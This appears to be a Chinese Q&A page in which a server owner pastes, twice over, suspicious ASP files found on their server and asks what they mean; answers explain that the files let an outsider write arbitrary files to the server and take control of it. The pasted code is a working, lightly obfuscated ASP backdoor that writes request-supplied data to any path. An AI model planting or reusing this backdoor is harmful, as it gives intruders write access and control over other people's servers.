UC知道ASP黑客程序分享
来源:百度知道 编辑:UC知道 时间:2024/06/05 02:58:36
昨天我的服务器上多了很多奇怪的ASP文件,其内容如下,有没有那个高手可以解释下面的意思.谢谢!
<%dim objfso%>
<%dim fdata%>
<%dim objcountfile%>
<%on error resume next%>
<%set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")%>
<%if trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%set objcountfile=objfso.createtextfile(request("syfdpath"),true)%>
<%objcountfile.write fdata%>
<%if err =0 then%>
<%response.write "<font color=red>save success!</font>"%>
<%else%>
<%response.write "<font color=red>save unsuccess!</font>"%>
<%end if%>
<%err.clear%>
<%end if%>
<%objcountfile.close%>
<%dim objfso%>
<%dim fdata%>
<%dim objcountfile%>
<%on error resume next%>
<%set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")%>
<%if trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%set objcountfile=objfso.createtextfile(request("syfdpath"),true)%>
<%objcountfile.write fdata%>
<%if err =0 then%>
<%response.write "<font color=red>save success!</font>"%>
<%else%>
<%response.write "<font color=red>save unsuccess!</font>"%>
<%end if%>
<%err.clear%>
<%end if%>
<%objcountfile.close%>
在服务器上生成个文件而已没什么大不了的
只要人家的服务器不允许用scripting.filesystem这个组建就不行
还有就是不给ntfs写入权限你也就毛用了
这个已经非常危险了,他可以在你的服务器上写入文件,也就意味着他可以在你的电脑上传程序当然也就可以在你的电脑上执行程序了!!!!!他可以得到你电脑的所有权限!!!!!
比如说,他在你的电脑上传一个文本上传工具(asp)然后再上传一个程序到你的电脑上的自动运行目录,如:你的程序菜单下的启动目录,你电脑启动时就可以自动运行他上传的程序了.
危险!!!!!!!!!你的电脑已经被控制!!